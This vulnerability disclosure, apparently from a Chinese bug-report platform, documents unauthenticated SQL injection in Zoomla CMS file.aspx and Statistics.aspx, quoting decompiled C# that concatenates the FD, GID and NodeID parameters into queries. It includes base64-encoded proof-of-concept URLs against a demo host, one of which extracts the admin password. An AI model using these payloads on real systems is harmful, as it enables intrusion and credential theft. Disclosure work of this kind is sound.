### 简要描述:
无需登录,完美的 SQL 注入点!
### 详细说明:
```
0x1
App_Web_rckpp0om.dll
User_file 类,Page_Load()事件就有问题
if ((base.Request["state"] != null) && (base.Request["state"] == "tr"))
{
string str4 = base.Request.QueryString["FD"];
this.FileUrl = this.FileJiema(str4);
this.hid.Value = str4;
this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID }));//注入点
if (this.file.DownUrl == null)
{
base.Response.Write("0");
base.Response.End();
}
看一下bfile.SelectFile(string)函数,拼接SQL语句
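/// <summary>
/// Loads a single ZL_File row into an M_File.
/// </summary>
/// <param name="where">
/// Raw body of the SQL WHERE clause, or "" for no filter. The value is appended
/// to the query verbatim — no escaping, no parameters — so the caller is fully
/// responsible for it. It MUST NOT contain anything derived from request input:
/// the Page_Load caller above builds it from the decoded FD query-string value,
/// which is exactly the SQL injection this report describes. The real fix is a
/// parameterised lookup (FileName + UserID bound as SqlParameters) and retiring
/// this free-form signature; the signature is kept here only so existing callers
/// still compile.
/// </param>
/// <returns>
/// The first matching row, or a default-constructed M_File (DownUrl left unset)
/// when the query returns nothing.
/// </returns>
public M_File SelectFile(string where)
{
    // "" means the whole table; anything else is trusted as a WHERE body.
    if (where == "")
    {
        this.sql = "select * from ZL_File";
    }
    else
    {
        // SECURITY: string-built SQL. An attacker-controlled 'where' runs arbitrary queries.
        this.sql = "select * from ZL_File where " + where;
    }

    M_File file = new M_File();

    // The original never closed the reader; dispose it so the underlying
    // connection/command resources are released even when no row is read.
    using (SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql))
    {
        if (reader.Read())
        {
            file.UserID = Convert.ToInt32(reader["UserID"]);
            file.State = Convert.ToInt32(reader["State"]);
            file.ExtractionCode = reader["ExtractionCode"].ToString();
            file.DownUrl = reader["DownUrl"].ToString();
            file.FileName = reader["FileName"].ToString();
            file.FileMD5 = reader["FileMD5"].ToString();
        }
    }

    return file;
}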
base.Request.QueryString["FD"] 可控:它经 FileJiema() 解码后未做任何转义就拼进了 FileName='...' 这个条件,而 SelectFile 又把整段条件原样追加到 SQL 里,所以只要把注入语句按 base64 编码放进 FD 即可!
```
搜索一下调用user_file类的文件:url为http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr
```
FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
```
理论上这个点还可以任意文件读取(前提是后续代码直接按 file.DownUrl 输出文件;这部分代码此处未展示,需要另行验证)。
0x2
```
App_Web_acbkzcqn.dll 中的Edit_Statistics类
protected void Page_Load(object sender, EventArgs e)
{
this.GroupID = this.buser.GetLogin().GroupID;
string groupName = this.bGll.GetByID(this.GroupID).GroupName;
if (base.Request.QueryString["GID"] != null)
{
base.Request.QueryString["GID"].ToString();
M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"])));
XmlDocument document = new XmlDocument();
try
{
document.Load(base.Server.MapPath("/Config/Payment.xml"));
}
catch (Exception)
{
function.WriteErrMsg("出现错误");
}
XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner");
this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value);
M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0 and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" }));//注入点
this.BEcount = this.b_EditWord.BnumCount("");
this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);
```
GID 注入(GID 未经任何转换直接拼入 SelectBnum 的条件),前面的 NodeID 带入正常访问的值即可。另外注意 BnumCount 那一行同样把 NodeID 原样拼接,所以 NodeID 也是一个注入点;只有 GetNodeXML 那一处对 NodeID 做了 DataConverter.CLng 转换。
Edit/Statistics.aspx
不测试了,官方修一下吧。
### 漏洞证明:
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr